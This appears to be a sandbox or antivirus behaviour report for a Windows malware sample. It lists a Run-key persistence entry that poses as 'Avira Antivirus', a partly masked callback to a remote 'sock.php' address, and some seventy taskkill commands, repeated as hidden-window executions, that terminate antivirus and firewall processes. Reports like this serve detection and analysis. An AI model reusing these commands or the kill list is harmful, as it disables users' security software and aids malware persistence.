Technical Information
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Avira Antivirus' = '%APPDATA%\avira_av.exe'
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32krn.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avengine.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pandaav.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavProt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im padmin.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavPrSrv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tsc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pop3trap.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmntsrv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmproxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PCCTool.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pccntupd.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im cpdclnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im issvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nisum.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im logexprt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im navapsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im npfmntor.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im apvxdwin.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im webProxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM AVGCtrl.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im realmon.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im vettray.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im VetMsg.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im InoRpc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im caissdt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im INOTask.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdswitch.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im UpdClient.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im vsserv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Spiderml.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im SCCOMM.EXE
- '%WINDIR%\syswow64\taskkill.exe' /f /im avsched32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im sched.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avguard.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im norton.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im navw32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im cccproxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashserv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashmaisv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashDisp.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashWebSv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgw.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgupsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgamsvr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgcc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgemc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im KAVPF.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im kavmm.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im kav.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32kui.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ewidoctrl.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im guard.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im aswupdsv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im gcasDtServ.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Norton Auto-Protect.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsMpEng.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccevtmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccsetmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccapp.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlclient.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zonealarm.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im minilog.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdss.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS_1630.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zauinst.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zapro.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im isafe.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im outpost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsiExec.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im mghtml.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im mcafee.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlcliente.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS-AVS.exe
- %APPDATA%\avira_av.exe
- 'da##an.nl':80
- http://www.da##an.nl/sock.php?da########################################################################################################################################################
- DNS ASK da##an.nl
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32krn.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avengine.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pandaav.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavProt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im padmin.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavPrSrv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tsc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pop3trap.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmntsrv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmproxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PCCTool.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pccntupd.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im cpdclnt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im issvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nisum.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im logexprt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im navapsvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im npfmntor.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im apvxdwin.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im webProxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM AVGCtrl.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im realmon.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im vettray.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im VetMsg.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im InoRpc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im caissdt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im INOTask.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdswitch.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im UpdClient.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im vsserv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im Spiderml.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im SCCOMM.EXE' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avsched32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im sched.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgnt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avguard.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im norton.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im navw32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im cccproxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashserv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashmaisv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashDisp.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashWebSv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgw.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgupsvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgamsvr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgcc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgemc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im KAVPF.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im kavmm.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im kav.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32kui.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ewidoctrl.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im guard.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im aswupdsv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im gcasDtServ.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im Norton Auto-Protect.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsMpEng.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccevtmgr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccsetmgr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccapp.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlclient.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zonealarm.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im minilog.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdss.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS_1630.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zauinst.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zapro.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im isafe.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im outpost.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsiExec.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im mghtml.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im mcafee.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlcliente.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS-AVS.exe' (with hidden window)